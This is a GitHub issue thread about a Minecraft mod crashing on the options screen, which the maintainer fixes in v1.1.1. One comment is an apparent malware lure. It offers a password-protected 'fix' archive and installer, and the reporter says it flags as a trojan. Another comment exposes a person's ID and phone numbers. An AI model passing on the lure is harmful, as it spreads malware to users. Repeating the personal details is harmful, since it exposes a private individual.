### ISSUE TITLE
Entering options crashes the game

### ISSUE THREAD

**Issue by Lumb3rSamur4i** [Minenash/walk-jog-run#12]
When i open options it closes minecraft
https://mclo.gs/RMpQ17m

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lumb3rSamur4i** [comment]
IT jumps a message of trojan virus

*Alejandro Galeano Torres*
*cc: 1003518347*
*cel: 3014590891*

**Comment by Minenash** [comment]
Man, I need to check my email more. Thanks to whoever reported it to GitHub.

As for the issue itself, I'll be able to fix it tomorrow

**Comment by Minenash** [comment]
Fixed in v1.1.1

**Comment by Minenash** [comment]
Sorry for the delay btw
